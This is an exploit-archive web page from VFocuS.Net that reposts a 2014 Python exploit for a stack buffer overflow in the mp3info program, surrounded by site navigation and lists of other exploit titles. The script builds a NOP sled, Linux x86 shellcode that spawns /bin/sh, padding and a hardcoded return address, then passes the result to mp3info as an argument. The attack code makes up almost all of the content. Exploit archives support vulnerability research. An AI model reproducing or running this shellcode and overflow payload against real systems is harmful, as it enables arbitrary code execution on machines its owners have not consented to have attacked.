首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mp3info Stack Buffer Overflow
来源:jsacco@exploitpack.com 作者:Sacco 发布时间:2014-01-28  
# Waste of CPU clock N2 # Exploit for: mp3info! Latest version # Author: jsacco - jsacco@exploitpack.com # Vendor: http://ibiblio.org/mp3info/ # No-one-cares-about programs! junk = "\x90\x90\x90\x90"*8 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" buffer = "\x90\x90\x90\x90"*89 eip = "\x10\xf0\xff\xbf" print "# MP3info is prone to a Stack-BoF" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes" try: subprocess.call(["mp3info", junk+shellcode+buffer+eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "MP3Info not found!" else: print "Error executing exploit" raise
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ammyy Admin 3.2 - Authenticati
·Simple E-Document Arbitrary Fi
·Daum Game 1.1.0.5 ActiveX (Ico
·Nitro Pro Remote Code Executio
·MW6 Technologies MaxiCode Acti
·Motorola SBG6580 Cable Modem &
·MW6 Technologies DataMatrix Ac
·Oracle Forms and Reports 11.1
·MW6 Technologies Aztec ActiveX
·PCMAN FTP 2.07 ABOR Command -
·NCH Software Express Burn Plus
·haneWIN DNS Server 1.5.3 - Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved